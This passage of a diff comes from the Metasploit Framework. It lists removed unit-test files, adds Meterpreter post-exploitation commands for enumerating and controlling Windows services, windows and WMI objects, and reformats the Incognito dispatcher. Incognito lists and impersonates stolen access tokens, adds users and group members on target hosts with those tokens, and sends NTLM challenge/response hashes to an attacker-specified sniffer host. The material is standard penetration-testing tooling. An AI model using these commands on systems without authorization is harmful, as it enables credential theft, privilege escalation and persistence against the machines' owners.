  462. data/lib/rex/exploitation/omelet.rb.ut.rb +0 -27
  463. data/lib/rex/exploitation/opcodedb.rb.ut.rb +0 -280
  464. data/lib/rex/exploitation/seh.rb.ut.rb +0 -20
  465. data/lib/rex/file.rb.ut.rb +0 -17
  466. data/lib/rex/io/ring_buffer.rb.ut.rb +0 -135
  467. data/lib/rex/nop/opty2.rb.ut.rb +0 -24
  468. data/lib/rex/parser/arguments.rb.ut.rb +0 -68
  469. data/lib/rex/parser/ini.rb.ut.rb +0 -30
  470. data/lib/rex/post/meterpreter/extensions/stdapi/railgun.rb.ts.rb +0 -18
  471. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb.ut.rb +0 -39
  472. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb.ut.rb +0 -37
  473. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb.ut.rb +0 -52
  474. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb.ut.rb +0 -43
  475. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb.ut.rb +0 -128
  476. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_wrapper.rb.ut.rb +0 -64
  477. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/platform_util.rb.ut.rb +0 -29
  478. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb.ut.rb +0 -155
  479. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/type/pointer_util.rb.ut.rb +0 -128
  480. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb.ut.rb +0 -124
  481. data/lib/rex/proto.rb.ts.rb +0 -9
  482. data/lib/rex/proto/dcerpc.rb.ts.rb +0 -10
  483. data/lib/rex/proto/dcerpc/client.rb.ut.rb +0 -492
  484. data/lib/rex/proto/dcerpc/handle.rb.ut.rb +0 -86
  485. data/lib/rex/proto/dcerpc/ndr.rb.ut.rb +0 -42
  486. data/lib/rex/proto/dcerpc/packet.rb.ut.rb +0 -57
  487. data/lib/rex/proto/dcerpc/response.rb.ut.rb +0 -16
  488. data/lib/rex/proto/dcerpc/uuid.rb.ut.rb +0 -47
  489. data/lib/rex/proto/drda.rb.ts.rb +0 -18
  490. data/lib/rex/proto/drda/constants.rb.ut.rb +0 -24
  491. data/lib/rex/proto/drda/packet.rb.ut.rb +0 -110
  492. data/lib/rex/proto/drda/utils.rb.ut.rb +0 -85
  493. data/lib/rex/proto/http.rb.ts.rb +0 -13
  494. data/lib/rex/proto/http/client.rb.ut.rb +0 -96
  495. data/lib/rex/proto/http/handler/erb.rb.ut.rb +0 -22
  496. data/lib/rex/proto/http/handler/erb.rb.ut.rb.rhtml +0 -1
  497. data/lib/rex/proto/http/handler/proc.rb.ut.rb +0 -25
  498. data/lib/rex/proto/http/header.rb.ut.rb +0 -47
  499. data/lib/rex/proto/http/packet.rb.ut.rb +0 -166
  500. data/lib/rex/proto/http/request.rb.ut.rb +0 -215
  501. data/lib/rex/proto/http/response.rb.ut.rb +0 -150
  502. data/lib/rex/proto/http/server.rb.ut.rb +0 -80
  503. data/lib/rex/proto/ntlm.rb.ut.rb +0 -181
  504. data/lib/rex/proto/rfb.rb.ut.rb +0 -40
  505. data/lib/rex/proto/smb.rb.ts.rb +0 -9
  506. data/lib/rex/proto/smb/client.rb.ut.rb +0 -224
  507. data/lib/rex/proto/smb/constants.rb.ut.rb +0 -19
  508. data/lib/rex/proto/smb/simpleclient.rb.ut.rb +0 -129
  509. data/lib/rex/proto/smb/utils.rb.ut.rb +0 -21
  510. data/lib/rex/proto/tftp/server.rb.ut.rb +0 -29
  511. data/lib/rex/service_manager.rb.ut.rb +0 -33
  512. data/lib/rex/socket.rb.ut.rb +0 -108
  513. data/lib/rex/socket/comm/local.rb.ut.rb +0 -76
  514. data/lib/rex/socket/parameters.rb.ut.rb +0 -52
  515. data/lib/rex/socket/range_walker.rb.ut.rb +0 -56
  516. data/lib/rex/socket/ssl_tcp.rb.ut.rb +0 -40
  517. data/lib/rex/socket/ssl_tcp_server.rb.ut.rb +0 -62
  518. data/lib/rex/socket/subnet_walker.rb.ut.rb +0 -29
  519. data/lib/rex/socket/switch_board.rb.ut.rb +0 -53
  520. data/lib/rex/socket/tcp.rb.ut.rb +0 -65
  521. data/lib/rex/socket/tcp_server.rb.ut.rb +0 -45
  522. data/lib/rex/socket/udp.rb.ut.rb +0 -45
  523. data/lib/rex/test.rb +0 -36
  524. data/lib/rex/text.rb.ut.rb +0 -193
  525. data/lib/rex/transformer.rb.ut.rb +0 -39
  526. data/lib/rex/ui/text/color.rb.ut.rb +0 -19
  527. data/lib/rex/ui/text/progress_tracker.rb.ut.rb +0 -35
  528. data/lib/rex/ui/text/table.rb.ut.rb +0 -56
@@ -0,0 +1,199 @@
1
+ # -*- coding: binary -*-
2
+ require 'rex/post/meterpreter'
3
+
4
+ module Rex
5
+ module Post
6
+ module Meterpreter
7
+ module Ui
8
+
9
+ ###
10
+ #
11
+ # Extended API window management user interface.
12
+ #
13
+ ###
14
+ class Console::CommandDispatcher::Extapi::Service
15
+
16
+ Klass = Console::CommandDispatcher::Extapi::Service
17
+
18
+ include Console::CommandDispatcher
19
+
20
+ #
21
+ # List of supported commands.
22
+ #
23
+ def commands
24
+ {
25
+ "service_enum" => "Enumerate all registered Windows services",
26
+ "service_query" => "Query more detail about a specific Windows service",
27
+ "service_control" => "Control a single service (start/pause/resume/stop/restart)"
28
+ }
29
+ end
30
+
31
+ #
32
+ # Name for this dispatcher
33
+ #
34
+ def name
35
+ "Extapi: Service Management"
36
+ end
37
+
38
+ #
39
+ # Initialize the instance
40
+ #
41
+ def initialize(shell)
42
+ super
43
+
44
+ @status_map = {
45
+ 1 => "Stopped",
46
+ 2 => "Starting",
47
+ 3 => "Stopping",
48
+ 4 => "Running",
49
+ 5 => "Continuing",
50
+ 6 => "Pausing",
51
+ 7 => "Paused"
52
+ }
53
+
54
+ @start_type_map = {
55
+ 0 => "Boot",
56
+ 1 => "System",
57
+ 2 => "Automatic",
58
+ 3 => "Manual",
59
+ 4 => "Disabled"
60
+ }
61
+ end
62
+
63
+ #
64
+ # Options for the service_enum command.
65
+ #
66
+ @@service_enum_opts = Rex::Parser::Arguments.new(
67
+ "-h" => [ false, "Help banner" ]
68
+ )
69
+
70
+ #
71
+ # Query a single service for more detail.
72
+ #
73
+ def cmd_service_enum(*args)
74
+ @@service_enum_opts.parse(args) do |opt, idx, val|
75
+ case opt
76
+ when "-h"
77
+ print(
78
+ "\nUsage: service_enum [-h]\n\n" +
79
+ "Enumerate services installed on the target.\n\n" +
80
+ "Enumeration returns the Process ID, Status, and name of each installed\n" +
81
+ "service that was enumerated. The 'Int' value indicates if the service is\n" +
82
+ "able to interact with the desktop.\n\n")
83
+ return true
84
+ end
85
+ end
86
+
87
+ services = client.extapi.service.enumerate
88
+
89
+ table = Rex::Ui::Text::Table.new(
90
+ 'Header' => 'Service List',
91
+ 'Indent' => 0,
92
+ 'SortIndex' => 3,
93
+ 'Columns' => [
94
+ 'PID', 'Status', 'Int', 'Name (Display Name)'
95
+ ]
96
+ )
97
+
98
+ services.each do |s|
99
+ table << [
100
+ s[:pid],
101
+ @status_map[s[:status]],
102
+ s[:interactive] ? "Y" : "N",
103
+ "#{s[:name].downcase} (#{s[:display]})"
104
+ ]
105
+ end
106
+
107
+ print_line
108
+ print_line(table.to_s)
109
+ print_line
110
+ print_line("Total services: #{services.length}")
111
+ print_line
112
+
113
+ return true
114
+ end
115
+
116
+ #
117
+ # Options for the service_query command.
118
+ #
119
+ @@service_query_opts = Rex::Parser::Arguments.new(
120
+ "-h" => [ false, "Help banner" ]
121
+ )
122
+
123
+ #
124
+ # Query a single service for more detail.
125
+ #
126
+ def cmd_service_query(*args)
127
+ args.unshift("-h") if args.length != 1
128
+
129
+ @@service_query_opts.parse(args) do |opt, idx, val|
130
+ case opt
131
+ when "-h"
132
+ print(
133
+ "\nUsage: service_query [-h] <servicename>\n" +
134
+ " <servicename>: The name of the service to query.\n\n" +
135
+ "Gets details information about a particular Windows service, including\n" +
136
+ "binary path, DACL, load order group, start type and more.\n\n")
137
+ return true
138
+ end
139
+ end
140
+
141
+ service_name = args.shift
142
+
143
+ detail = client.extapi.service.query(service_name)
144
+
145
+ print_line
146
+ print_line("Name : #{service_name}")
147
+ print_line("Display : #{detail[:display]}")
148
+ print_line("Account : #{detail[:startname]}")
149
+ print_line("Status : #{@status_map[detail[:status]]}")
150
+ print_line("Start Type : #{@start_type_map[detail[:starttype]]}")
151
+ print_line("Path : #{detail[:path]}")
152
+ print_line("L.O. Group : #{detail[:logroup]}")
153
+ print_line("Interactive : #{detail[:interactive] ? "Yes" : "No"}")
154
+ print_line("DACL : #{detail[:dacl]}")
155
+ print_line
156
+
157
+ end
158
+
159
+ #
160
+ # Options for the service_control command.
161
+ #
162
+ @@service_control_opts = Rex::Parser::Arguments.new(
163
+ "-h" => [ false, "Help banner" ]
164
+ )
165
+
166
+ #
167
+ # Query a single service for more detail.
168
+ #
169
+ def cmd_service_control(*args)
170
+ args.unshift("-h") if args.length != 2
171
+
172
+ @@service_control_opts.parse(args) do |opt, idx, val|
173
+ case opt
174
+ when "-h"
175
+ print(
176
+ "\nUsage: service_control [-h] <servicename> <op>\n" +
177
+ " <servicename> : The name of the service to control.\n" +
178
+ " <op> : The operation to perform on the service.\n" +
179
+ " Valid ops: start pause resume stop restart.\n\n")
180
+ return true
181
+ end
182
+ end
183
+
184
+ service_name = args[0]
185
+ op = args[1]
186
+
187
+ client.extapi.service.control(service_name, op)
188
+
189
+ print_good("Operation #{op} succeeded.")
190
+ end
191
+
192
+ end
193
+
194
+ end
195
+ end
196
+ end
197
+ end
198
+
199
+
@@ -0,0 +1,118 @@
1
+ # -*- coding: binary -*-
2
+ require 'rex/post/meterpreter'
3
+
4
+ module Rex
5
+ module Post
6
+ module Meterpreter
7
+ module Ui
8
+
9
+ ###
10
+ #
11
+ # Extended API window management user interface.
12
+ #
13
+ ###
14
+ class Console::CommandDispatcher::Extapi::Window
15
+
16
+ Klass = Console::CommandDispatcher::Extapi::Window
17
+
18
+ include Console::CommandDispatcher
19
+
20
+ #
21
+ # List of supported commands.
22
+ #
23
+ def commands
24
+ {
25
+ "window_enum" => "Enumerate all current open windows"
26
+ }
27
+ end
28
+
29
+ #
30
+ # Name for this dispatcher
31
+ #
32
+ def name
33
+ "Extapi: Window Management"
34
+ end
35
+
36
+ #
37
+ # Options for the window_enum command.
38
+ #
39
+ @@window_enum_opts = Rex::Parser::Arguments.new(
40
+ "-h" => [ false, "Help banner" ],
41
+ "-p" => [ true, "Parent window handle, used to enumerate child windows" ],
42
+ "-u" => [ false, "Include unknown/untitled windows in the result set" ]
43
+ )
44
+
45
+ def window_enum_usage
46
+ print(
47
+ "\nUsage: window_enum [-h] [-p parent_window] [-u]\n\n" +
48
+ "Enumerate the windows on the target.\n\n" +
49
+ "Enumeration returns the Process ID and Window Handle for each window\n" +
50
+ "found. The Window Handle can be used for further calls to window_enum\n" +
51
+ "or the railgun API.\n" +
52
+ @@window_enum_opts.usage +
53
+ "Note: Not all windows can be enumerated. An attempt to enumerate\n" +
54
+ " the children of such a window will result in a failure with the\n"+
55
+ " message \"Operation failed: The parameter is incorrect.\"\n\n")
56
+ end
57
+
58
+ #
59
+ # Enumerate top-level windows.
60
+ #
61
+ def cmd_window_enum(*args)
62
+ parent_window = nil
63
+ include_unknown = false
64
+
65
+ @@window_enum_opts.parse(args) { |opt, idx, val|
66
+ case opt
67
+ when "-u"
68
+ include_unknown = true
69
+ when "-p"
70
+ parent_window = val.to_i
71
+ if parent_window == 0
72
+ window_enum_usage
73
+ return true
74
+ end
75
+ when "-h"
76
+ window_enum_usage
77
+ return true
78
+ end
79
+ }
80
+
81
+ windows = client.extapi.window.enumerate(include_unknown, parent_window)
82
+
83
+ header = parent_window ? "Child windows of #{parent_window}" : "Top-level windows"
84
+
85
+ table = Rex::Ui::Text::Table.new(
86
+ 'Header' => header,
87
+ 'Indent' => 0,
88
+ 'SortIndex' => 0,
89
+ 'Columns' => [
90
+ 'PID', 'Handle', 'Title'
91
+ ]
92
+ )
93
+
94
+ windows.each { |w|
95
+ table << [w[:pid], w[:handle], w[:title]]
96
+ }
97
+
98
+ print_line
99
+ print_line(table.to_s)
100
+
101
+ if parent_window.nil?
102
+ print_line("Total top-level Windows: #{windows.length}")
103
+ else
104
+ print_line("Total child Windows: #{windows.length}")
105
+ end
106
+
107
+ print_line
108
+
109
+ return true
110
+ end
111
+
112
+ end
113
+
114
+ end
115
+ end
116
+ end
117
+ end
118
+
@@ -0,0 +1,108 @@
1
+ # -*- coding: binary -*-
2
+ require 'rex/post/meterpreter'
3
+
4
+ module Rex
5
+ module Post
6
+ module Meterpreter
7
+ module Ui
8
+
9
+ ###
10
+ #
11
+ # Extended API WMI Querying interface.
12
+ #
13
+ ###
14
+ class Console::CommandDispatcher::Extapi::Wmi
15
+
16
+ Klass = Console::CommandDispatcher::Extapi::Wmi
17
+
18
+ include Console::CommandDispatcher
19
+
20
+ # Zero indicates "no limit"
21
+ DEFAULT_MAX_RESULTS = 0
22
+ DEFAULT_PAGE_SIZE = 0
23
+
24
+ #
25
+ # List of supported commands.
26
+ #
27
+ def commands
28
+ {
29
+ "wmi_query" => "Perform a generic WMI query and return the results"
30
+ }
31
+ end
32
+
33
+ #
34
+ # Name for this dispatcher
35
+ #
36
+ def name
37
+ "Extapi: WMI Querying"
38
+ end
39
+
40
+ #
41
+ # Options for the wmi_query command.
42
+ #
43
+ @@wmi_query_opts = Rex::Parser::Arguments.new(
44
+ "-h" => [ false, "Help banner" ],
45
+ "-r" => [ true, "Specify a different root object (defaults to 'root\\CIMV2')" ]
46
+ )
47
+
48
+ def wmi_query_usage
49
+ print(
50
+ "\nUsage: wmi_query <query string> [-r root]\n\n" +
51
+ "Query the target and display the results.\n\n" +
52
+ @@wmi_query_opts.usage)
53
+ end
54
+
55
+ #
56
+ # Enumerate WMI objects.
57
+ #
58
+ def cmd_wmi_query(*args)
59
+ args.unshift("-h") if args.length < 1
60
+
61
+ root = nil
62
+
63
+ @@wmi_query_opts.parse(args) { |opt, idx, val|
64
+ case opt
65
+ when "-r"
66
+ root = val
67
+ when "-h"
68
+ wmi_query_usage
69
+ return true
70
+ end
71
+ }
72
+
73
+ query = args.shift
74
+
75
+ objects = client.extapi.wmi.query(query, root)
76
+
77
+ if objects
78
+ table = Rex::Ui::Text::Table.new(
79
+ 'Header' => query,
80
+ 'Indent' => 0,
81
+ 'SortIndex' => 0,
82
+ 'Columns' => objects[:fields]
83
+ )
84
+
85
+ objects[:values].each do |c|
86
+ table << c
87
+ end
88
+
89
+ print_line
90
+ print_line(table.to_s)
91
+
92
+ print_line("Total objects: #{objects[:values].length}")
93
+ else
94
+ print_status("The WMI query yielded no results.")
95
+ end
96
+
97
+ print_line
98
+
99
+ return true
100
+ end
101
+
102
+ end
103
+
104
+ end
105
+ end
106
+ end
107
+ end
108
+
@@ -13,226 +13,226 @@ module Ui
13
13
  ###
14
14
  class Console::CommandDispatcher::Incognito
15
15
 
16
- Klass = Console::CommandDispatcher::Incognito
17
-
18
- include Console::CommandDispatcher
19
-
20
- #
21
- # Initializes an instance of the priv command interaction.
22
- #
23
- def initialize(shell)
24
- super
25
- end
26
-
27
- #
28
- # List of supported commands.
29
- #
30
- def commands
31
- {
32
- "add_user" => "Attempt to add a user with all tokens",
33
- "add_localgroup_user" => "Attempt to add a user to a local group with all tokens",
34
- "add_group_user" => "Attempt to add a user to a global group with all tokens",
35
- "list_tokens" => "List tokens available under current user context",
36
- "impersonate_token" => "Impersonate specified token",
37
- "snarf_hashes" => "Snarf challenge/response hashes for every token"
38
- }
39
- end
40
-
41
-
42
- @@add_user_opts = Rex::Parser::Arguments.new(
43
- "-h" => [ true, "Add user to remote host" ])
44
-
45
- @@add_localgroup_user_opts = Rex::Parser::Arguments.new(
46
- "-h" => [ true, "Add user to local group on remote host" ])
47
-
48
- @@add_group_user_opts = Rex::Parser::Arguments.new(
49
- "-h" => [ true, "Add user to global group on remote host" ])
50
-
51
- @@list_tokens_opts = Rex::Parser::Arguments.new(
52
- "-u" => [ false, "List tokens by unique username" ],
53
- "-g" => [ false, "List tokens by unique groupname" ])
54
-
55
- def cmd_list_tokens(*args)
56
- token_order = -1
57
-
58
- @@list_tokens_opts.parse(args) { |opt, idx, val|
59
- case opt
60
- when "-u"
61
- token_order = 0
62
- when "-g"
63
- token_order = 1
64
- end
65
- }
66
-
67
- if (token_order == -1)
68
- print_line("Usage: list_tokens <list_order_option>\n")
69
- print_line("Lists all accessible tokens and their privilege level")
70
- print_line(@@list_tokens_opts.usage)
71
- return
72
- end
73
-
74
- system_privilege_check
75
-
76
- tokens = client.incognito.incognito_list_tokens(token_order)
77
-
78
- print_line()
79
- print_line("Delegation Tokens Available")
80
- print_line("========================================")
81
-
82
- tokens['delegation'].each_line { |string|
83
- print(string)
84
- }
85
-
86
- print_line()
87
- print_line("Impersonation Tokens Available")
88
- print_line("========================================")
89
-
90
- tokens['impersonation'].each_line { |string|
91
- print(string)
92
- }
93
-
94
- print_line()
95
-
96
- return true
97
- end
98
-
99
- def cmd_impersonate_token(*args)
100
- if (args.length < 1)
101
- print_line("Usage: impersonate_token <token>\n")
102
- print_line("Instructs the meterpreter thread to impersonate the specified token. All other actions will then be made in the context of that token.\n")
103
- print_line("Hint: Double backslash DOMAIN\\\\name (meterpreter quirk)")
104
- print_line("Hint: Enclose with quotation marks if name contains a space\n")
105
- return
106
- end
107
-
108
- system_privilege_check
109
- username = args[0]
110
- client.incognito.incognito_impersonate_token(username).each_line { |string|
111
- print(string)
112
- }
113
-
114
- return true
115
- end
116
-
117
- def cmd_add_user(*args)
118
- # Default to localhost
119
- host = "127.0.0.1"
120
-
121
- @@add_user_opts.parse(args) { |opt, idx, val|
122
- case opt
123
- when "-h"
124
- host = val
125
- end
126
- }
127
-
128
- if (args.length < 2)
129
- print_line("Usage: add_user <username> <password> [options]\n")
130
- print_line("Attempts to add a user to a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. password does not meet complexity requirements) or when all tokens are exhausted")
131
- print_line(@@add_user_opts.usage)
132
- return
133
- end
134
-
135
- system_privilege_check
136
-
137
- username = args[0]
138
- password = args[1]
139
-
140
- client.incognito.incognito_add_user(host, username, password).each_line { |string|
141
- print(string)
142
- }
143
-
144
- return true
145
- end
146
-
147
- def cmd_add_localgroup_user(*args)
148
- # Default to localhost
149
- host = "127.0.0.1"
150
-
151
- @@add_localgroup_user_opts.parse(args) { |opt, idx, val|
152
- case opt
153
- when "-h"
154
- host = val
155
- end
156
- }
157
-
158
- if (args.length < 2)
159
- print_line("Usage: add_localgroup_user <groupname> <username> [options]\n")
160
- print_line("Attempts to add a user to a local group on a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. user not found) or when all tokens are exhausted")
161
- print_line(@@add_localgroup_user_opts.usage)
162
- return
163
- end
164
-
165
- system_privilege_check
166
-
167
- groupname = args[0]
168
- username = args[1]
169
-
170
- client.incognito.incognito_add_localgroup_user(host, groupname, username).each_line { |string|
171
- print(string)
172
- }
173
-
174
- return true
175
- end
176
-
177
- def cmd_add_group_user(*args)
178
- # Default to localhost
179
- host = "127.0.0.1"
180
-
181
- @@add_group_user_opts.parse(args) { |opt, idx, val|
182
- case opt
183
- when "-h"
184
- host = val
185
- end
186
- }
187
-
188
- if (args.length < 2)
189
- print_line("Usage: add_group_user <groupname> <username> [options]\n")
190
- print_line("Attempts to add a user to a global group on a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. user not found) or when all tokens are exhausted")
191
- print_line(@@add_group_user_opts.usage)
192
- return
193
- end
194
-
195
- system_privilege_check
196
-
197
- groupname = args[0]
198
- username = args[1]
199
-
200
- client.incognito.incognito_add_group_user(host, groupname, username).each_line { |string|
201
- print(string)
202
- }
203
-
204
- return true
205
- end
206
-
207
- def cmd_snarf_hashes(*args)
208
- if (args.length < 1)
209
- print_line("Usage: snarf_hashes <sniffer_host>\n")
210
- print_line("Captures LANMAN/NTLM challenge response hashes by making SMB requests to the supplied sniffing host with every accessible token.\n")
211
- return
212
- end
213
-
214
- system_privilege_check
215
-
216
- print_line("[*] Snarfing token hashes...")
217
- client.incognito.incognito_snarf_hashes(args[0])
218
- print_line("[*] Done. Check sniffer logs")
219
-
220
- return true
221
- end
222
-
223
- def system_privilege_check
224
- if (client.sys.config.getuid != "NT AUTHORITY\\SYSTEM")
225
- print_line("[-] Warning: Not currently running as SYSTEM, not all tokens will be available")
226
- print_line(" Call rev2self if primary process token is SYSTEM")
227
- end
228
- end
229
-
230
- #
231
- # Name for this dispatcher
232
- #
233
- def name
234
- "Incognito"
235
- end
16
+ Klass = Console::CommandDispatcher::Incognito
17
+
18
+ include Console::CommandDispatcher
19
+
20
+ #
21
+ # Initializes an instance of the priv command interaction.
22
+ #
23
+ def initialize(shell)
24
+ super
25
+ end
26
+
27
+ #
28
+ # List of supported commands.
29
+ #
30
+ def commands
31
+ {
32
+ "add_user" => "Attempt to add a user with all tokens",
33
+ "add_localgroup_user" => "Attempt to add a user to a local group with all tokens",
34
+ "add_group_user" => "Attempt to add a user to a global group with all tokens",
35
+ "list_tokens" => "List tokens available under current user context",
36
+ "impersonate_token" => "Impersonate specified token",
37
+ "snarf_hashes" => "Snarf challenge/response hashes for every token"
38
+ }
39
+ end
40
+
41
+
42
+ @@add_user_opts = Rex::Parser::Arguments.new(
43
+ "-h" => [ true, "Add user to remote host" ])
44
+
45
+ @@add_localgroup_user_opts = Rex::Parser::Arguments.new(
46
+ "-h" => [ true, "Add user to local group on remote host" ])
47
+
48
+ @@add_group_user_opts = Rex::Parser::Arguments.new(
49
+ "-h" => [ true, "Add user to global group on remote host" ])
50
+
51
+ @@list_tokens_opts = Rex::Parser::Arguments.new(
52
+ "-u" => [ false, "List tokens by unique username" ],
53
+ "-g" => [ false, "List tokens by unique groupname" ])
54
+
55
+ def cmd_list_tokens(*args)
56
+ token_order = -1
57
+
58
+ @@list_tokens_opts.parse(args) { |opt, idx, val|
59
+ case opt
60
+ when "-u"
61
+ token_order = 0
62
+ when "-g"
63
+ token_order = 1
64
+ end
65
+ }
66
+
67
+ if (token_order == -1)
68
+ print_line("Usage: list_tokens <list_order_option>\n")
69
+ print_line("Lists all accessible tokens and their privilege level")
70
+ print_line(@@list_tokens_opts.usage)
71
+ return
72
+ end
73
+
74
+ system_privilege_check
75
+
76
+ tokens = client.incognito.incognito_list_tokens(token_order)
77
+
78
+ print_line()
79
+ print_line("Delegation Tokens Available")
80
+ print_line("========================================")
81
+
82
+ tokens['delegation'].each_line { |string|
83
+ print(string)
84
+ }
85
+
86
+ print_line()
87
+ print_line("Impersonation Tokens Available")
88
+ print_line("========================================")
89
+
90
+ tokens['impersonation'].each_line { |string|
91
+ print(string)
92
+ }
93
+
94
+ print_line()
95
+
96
+ return true
97
+ end
98
+
99
+ def cmd_impersonate_token(*args)
100
+ if (args.length < 1)
101
+ print_line("Usage: impersonate_token <token>\n")
102
+ print_line("Instructs the meterpreter thread to impersonate the specified token. All other actions will then be made in the context of that token.\n")
103
+ print_line("Hint: Double backslash DOMAIN\\\\name (meterpreter quirk)")
104
+ print_line("Hint: Enclose with quotation marks if name contains a space\n")
105
+ return
106
+ end
107
+
108
+ system_privilege_check
109
+ username = args[0]
110
+ client.incognito.incognito_impersonate_token(username).each_line { |string|
111
+ print(string)
112
+ }
113
+
114
+ return true
115
+ end
116
+
117
+ def cmd_add_user(*args)
118
+ # Default to localhost
119
+ host = "127.0.0.1"
120
+
121
+ @@add_user_opts.parse(args) { |opt, idx, val|
122
+ case opt
123
+ when "-h"
124
+ host = val
125
+ end
126
+ }
127
+
128
+ if (args.length < 2)
129
+ print_line("Usage: add_user <username> <password> [options]\n")
130
+ print_line("Attempts to add a user to a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. password does not meet complexity requirements) or when all tokens are exhausted")
131
+ print_line(@@add_user_opts.usage)
132
+ return
133
+ end
134
+
135
+ system_privilege_check
136
+
137
+ username = args[0]
138
+ password = args[1]
139
+
140
+ client.incognito.incognito_add_user(host, username, password).each_line { |string|
141
+ print(string)
142
+ }
143
+
144
+ return true
145
+ end
146
+
147
+ def cmd_add_localgroup_user(*args)
148
+ # Default to localhost
149
+ host = "127.0.0.1"
150
+
151
+ @@add_localgroup_user_opts.parse(args) { |opt, idx, val|
152
+ case opt
153
+ when "-h"
154
+ host = val
155
+ end
156
+ }
157
+
158
+ if (args.length < 2)
159
+ print_line("Usage: add_localgroup_user <groupname> <username> [options]\n")
160
+ print_line("Attempts to add a user to a local group on a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. user not found) or when all tokens are exhausted")
161
+ print_line(@@add_localgroup_user_opts.usage)
162
+ return
163
+ end
164
+
165
+ system_privilege_check
166
+
167
+ groupname = args[0]
168
+ username = args[1]
169
+
170
+ client.incognito.incognito_add_localgroup_user(host, groupname, username).each_line { |string|
171
+ print(string)
172
+ }
173
+
174
+ return true
175
+ end
176
+
177
+ def cmd_add_group_user(*args)
178
+ # Default to localhost
179
+ host = "127.0.0.1"
180
+
181
+ @@add_group_user_opts.parse(args) { |opt, idx, val|
182
+ case opt
183
+ when "-h"
184
+ host = val
185
+ end
186
+ }
187
+
188
+ if (args.length < 2)
189
+ print_line("Usage: add_group_user <groupname> <username> [options]\n")
190
+ print_line("Attempts to add a user to a global group on a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. user not found) or when all tokens are exhausted")
191
+ print_line(@@add_group_user_opts.usage)
192
+ return
193
+ end
194
+
195
+ system_privilege_check
196
+
197
+ groupname = args[0]
198
+ username = args[1]
199
+
200
+ client.incognito.incognito_add_group_user(host, groupname, username).each_line { |string|
201
+ print(string)
202
+ }
203
+
204
+ return true
205
+ end
206
+
207
+ def cmd_snarf_hashes(*args)
208
+ if (args.length < 1)
209
+ print_line("Usage: snarf_hashes <sniffer_host>\n")
210
+ print_line("Captures LANMAN/NTLM challenge response hashes by making SMB requests to the supplied sniffing host with every accessible token.\n")
211
+ return
212
+ end
213
+
214
+ system_privilege_check
215
+
216
+ print_line("[*] Snarfing token hashes...")
217
+ client.incognito.incognito_snarf_hashes(args[0])
218
+ print_line("[*] Done. Check sniffer logs")
219
+
220
+ return true
221
+ end
222
+
223
+ def system_privilege_check
224
+ if (client.sys.config.getuid != "NT AUTHORITY\\SYSTEM")
225
+ print_line("[-] Warning: Not currently running as SYSTEM, not all tokens will be available")
226
+ print_line(" Call rev2self if primary process token is SYSTEM")
227
+ end
228
+ end
229
+
230
+ #
231
+ # Name for this dispatcher
232
+ #
233
+ def name
234
+ "Incognito"
235
+ end
236
236
 
237
237
  end
238
238